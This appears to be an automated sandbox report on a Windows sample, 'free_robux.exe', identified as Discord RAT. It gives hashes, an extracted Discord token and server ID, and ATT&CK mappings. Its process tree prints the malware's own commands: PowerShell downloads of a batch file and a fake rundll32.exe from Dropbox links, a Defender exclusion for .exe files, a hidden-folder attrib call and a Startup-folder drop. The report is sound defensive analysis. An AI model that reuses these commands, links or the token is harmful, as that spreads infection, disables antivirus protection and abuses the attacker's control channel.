discordrat | 34e3ef1782f00fc1145dcd343ad0bb4dd3b1e6b339ec44e894457ed993c96180

Analysis

max time kernel
25s
max time network
30s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
14-04-2024 19:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

free_robux.exe
Size

60KB
MD5

2e507f0800812783436579e8c6b39c08
SHA1

ab33967acff2c926af1b37665d552242cda0c66b
SHA256

34e3ef1782f00fc1145dcd343ad0bb4dd3b1e6b339ec44e894457ed993c96180
SHA512

5f085ce73807baf14888de4f6ea2e0fb0ec3f60dfbd4de5db219d434a0b69044d7f434f7f7e295572b925f0fba5dacc3debb8adda6d4f51f555883774dcafa50
SSDEEP

768:HX06/2vJPE9g8CoiesliFBl3WnWRPlNz30iB9L1zIOJlqYWoK4Xo:E6/2vO9g8CoiedwWRNxDzaoc

Score

10^/10

discordrat persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTA2ODI0MTMyMDk4MTgyNzU5NA.GDi6tE.t2T-c9UBEtvdju9XJt2A5HWfqJ2wasQ2apTfdg
server_id
1068241914974974063

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	3180	powershell.exe
4	3180	powershell.exe
9	4564	powershell.exe
11	4564	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rundll32.exe	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3268	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3180	powershell.exe
3180	powershell.exe
3180	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4564	powershell.exe
4564	powershell.exe
4564	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3180	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	3268	rundll32.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2820 wrote to memory of 4828	2820	free_robux.exe	72
PID 2820 wrote to memory of 4828	2820	free_robux.exe	72
PID 2820 wrote to memory of 4828	2820	free_robux.exe	72
PID 4828 wrote to memory of 168	4828	cmd.exe	75
PID 4828 wrote to memory of 168	4828	cmd.exe	75
PID 4828 wrote to memory of 168	4828	cmd.exe	75
PID 4828 wrote to memory of 3180	4828	cmd.exe	76
PID 4828 wrote to memory of 3180	4828	cmd.exe	76
PID 4828 wrote to memory of 3180	4828	cmd.exe	76
PID 4828 wrote to memory of 2000	4828	cmd.exe	77
PID 4828 wrote to memory of 2000	4828	cmd.exe	77
PID 4828 wrote to memory of 2000	4828	cmd.exe	77
PID 2000 wrote to memory of 4868	2000	cmd.exe	79
PID 2000 wrote to memory of 4868	2000	cmd.exe	79
PID 2000 wrote to memory of 4868	2000	cmd.exe	79
PID 2000 wrote to memory of 4564	2000	cmd.exe	80
PID 2000 wrote to memory of 4564	2000	cmd.exe	80
PID 2000 wrote to memory of 4564	2000	cmd.exe	80
PID 2000 wrote to memory of 3268	2000	cmd.exe	81
PID 2000 wrote to memory of 3268	2000	cmd.exe	81

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
168	attrib.exe

C:\Users\Admin\AppData\Local\Temp\free_robux.exe
"C:\Users\Admin\AppData\Local\Temp\free_robux.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t18552.bat" "C:\Users\Admin\AppData\Local\Temp\free_robux.exe" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4828
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
    3⤵
    - Views/modifies file attributes
    PID:168
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://www.dropbox.com/scl/fi/ntep6etnwv2a7zy9d24rk/installer.bat?rlkey=8vabtz5foxnu5c8kwlwf5tsk0&dl=1' -OutFile installer.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K installer.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2000
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Powershell -Command "Set-MpPreference -ExclusionExtension exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4868
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Powershell -Command "Invoke-Webrequest 'https://www.dropbox.com/scl/fi/a00j82aaume93lmgxjaf2/rundll32.exe?rlkey=g48q2ygxx00qamw9rthbyuycd&dl=1' -OutFile rundll32.exe"
      4⤵
      Blocklisted process makes network request
      Drops startup file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4564
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rundll32.exe
      rundll32.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
66382a4ca6c4dcf75ce41417d44be93e

SHA1
8132cbef1c12f8a89a68a6153ade4286bf130812

SHA256
a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

SHA512
2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c33e1472ab139d8548f7e3336d1c036e

SHA1
7b491fcd4d1898560ad420849f6d1262256e82bc

SHA256
b8fce9738bf3b6216856b748c9f73ca9fe7545d98b37791c28687709181891b8

SHA512
b125c07e41e2208b8771e33c5d52aeb243e043d50760da7e6eeb60db14e0c7d8537b417932da3bf02981a495410d51a41f6cf2b226a9bb376af4fd144fc0ce69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
3478e1e394845a6538ea076ccae580e0

SHA1
5b87542e830ae2ba1519710830d85d02e21386d7

SHA256
a0c9d716781adcae7dc0899a7b680f0aa479273c6112dcc3f0126faf30da77ec

SHA512
2a7b3d2fd3203cda825aa7fae23a483b31f9bac4dff1f9dd6ca84191d91f68042cdca611741eb1de17ce58be2bf6cda310fc78f0ffc12a63a28a464ed028e7ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vw4zuoft.kpg.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\installer.bat

Filesize
351B

MD5
565bc27d1ce261089248e015686ced44

SHA1
c0d5ae4157d640be0a92ff2ca65aae2df779d89c

SHA256
a7814711561ea3f63b7024b8f0c86fa821a289d6e921250e5645dd711f985085

SHA512
3908e46cca31d62455851573b8130d32f33a1b176b6a409f666c2a5295a13c2a2343445a904df1c215a20082101934c4f86af3fa21f16adc5eb5aa4fac7fa53e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytmp\t18552.bat

Filesize
553B

MD5
614ab525c175580e6bfc445b1cdc07ed

SHA1
1a8ff41c0f12ac1b004811698d9fa9c134387a97

SHA256
1e41dcb72d8c04f0403080683c5e27ced60c4b3e239c86a836106b2149696cc5

SHA512
944e900691c57a742ab6348233f31d499e80216ebed2c9201f74e258480977cdd5c128c4b4dab88921a3db324d624e48ec195c903f4c67ed790c64cf1283d9dd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rundll32.exe

Filesize
78KB

MD5
07b4cb955d927adf3b6e6759afddeb3b

SHA1
325dfb2c21dd42f9f283371ee324d9970d382582

SHA256
1369a89434e40b5fe3271516601c2fbcf1ac2118c862b4fd5007e5008ec14384

SHA512
3564bcf82db904f8e750b0a54406eba97e676b8e580fee1669ec84374b493fa3a037f78b2d3a14c55468836453409146b57ce65d8dc3ed95df588485a9fad29b

Download Submit
memory/3180-14-0x0000000008130000-0x0000000008196000-memory.dmp

Filesize
408KB

Download
memory/3180-7-0x0000000072570000-0x0000000072C5E000-memory.dmp

Filesize
6.9MB

Download
memory/3180-15-0x00000000082B0000-0x0000000008600000-memory.dmp

Filesize
3.3MB

Download
memory/3180-16-0x0000000008200000-0x000000000821C000-memory.dmp

Filesize
112KB

Download
memory/3180-17-0x00000000086B0000-0x00000000086FB000-memory.dmp

Filesize
300KB

Download
memory/3180-18-0x0000000008A20000-0x0000000008A96000-memory.dmp

Filesize
472KB

Download
memory/3180-13-0x0000000007FC0000-0x0000000008026000-memory.dmp

Filesize
408KB

Download
memory/3180-33-0x000000000A060000-0x000000000A6D8000-memory.dmp

Filesize
6.5MB

Download
memory/3180-34-0x0000000009790000-0x00000000097AA000-memory.dmp

Filesize
104KB

Download
memory/3180-35-0x00000000072E0000-0x00000000072F0000-memory.dmp

Filesize
64KB

Download
memory/3180-42-0x0000000072570000-0x0000000072C5E000-memory.dmp

Filesize
6.9MB

Download
memory/3180-12-0x00000000077E0000-0x0000000007802000-memory.dmp

Filesize
136KB

Download
memory/3180-11-0x0000000007920000-0x0000000007F48000-memory.dmp

Filesize
6.2MB

Download
memory/3180-8-0x00000000071C0000-0x00000000071F6000-memory.dmp

Filesize
216KB

Download
memory/3180-9-0x00000000072E0000-0x00000000072F0000-memory.dmp

Filesize
64KB

Download
memory/3180-10-0x00000000072E0000-0x00000000072F0000-memory.dmp

Filesize
64KB

Download
memory/3268-325-0x0000020C73160000-0x0000020C73322000-memory.dmp

Filesize
1.8MB

Download
memory/3268-326-0x00007FFF47D10000-0x00007FFF486FC000-memory.dmp

Filesize
9.9MB

Download
memory/3268-324-0x0000020C58B40000-0x0000020C58B58000-memory.dmp

Filesize
96KB

Download
memory/3268-327-0x0000020C73960000-0x0000020C73E86000-memory.dmp

Filesize
5.1MB

Download
memory/4564-296-0x00000000731B0000-0x000000007389E000-memory.dmp

Filesize
6.9MB

Download
memory/4564-320-0x00000000731B0000-0x000000007389E000-memory.dmp

Filesize
6.9MB

Download
memory/4564-314-0x00000000051B0000-0x00000000051C0000-memory.dmp

Filesize
64KB

Download
memory/4564-298-0x00000000051B0000-0x00000000051C0000-memory.dmp

Filesize
64KB

Download
memory/4564-297-0x00000000051B0000-0x00000000051C0000-memory.dmp

Filesize
64KB

Download
memory/4868-49-0x0000000006C90000-0x0000000006CA0000-memory.dmp

Filesize
64KB

Download
memory/4868-273-0x0000000006F80000-0x0000000006F9A000-memory.dmp

Filesize
104KB

Download
memory/4868-278-0x0000000006F70000-0x0000000006F78000-memory.dmp

Filesize
32KB

Download
memory/4868-293-0x00000000731B0000-0x000000007389E000-memory.dmp

Filesize
6.9MB

Download
memory/4868-80-0x0000000009890000-0x0000000009924000-memory.dmp

Filesize
592KB

Download
memory/4868-79-0x0000000006C90000-0x0000000006CA0000-memory.dmp

Filesize
64KB

Download
memory/4868-78-0x00000000096E0000-0x0000000009785000-memory.dmp

Filesize
660KB

Download
memory/4868-73-0x0000000009370000-0x000000000938E000-memory.dmp

Filesize
120KB

Download
memory/4868-72-0x000000006FE90000-0x000000006FEDB000-memory.dmp

Filesize
300KB

Download
memory/4868-71-0x00000000095B0000-0x00000000095E3000-memory.dmp

Filesize
204KB

Download
memory/4868-70-0x000000007EC70000-0x000000007EC80000-memory.dmp

Filesize
64KB

Download
memory/4868-53-0x0000000008220000-0x000000000826B000-memory.dmp

Filesize
300KB

Download
memory/4868-51-0x0000000007E80000-0x00000000081D0000-memory.dmp

Filesize
3.3MB

Download
memory/4868-50-0x0000000006C90000-0x0000000006CA0000-memory.dmp

Filesize
64KB

Download
memory/4868-48-0x00000000731B0000-0x000000007389E000-memory.dmp

Filesize
6.9MB

Download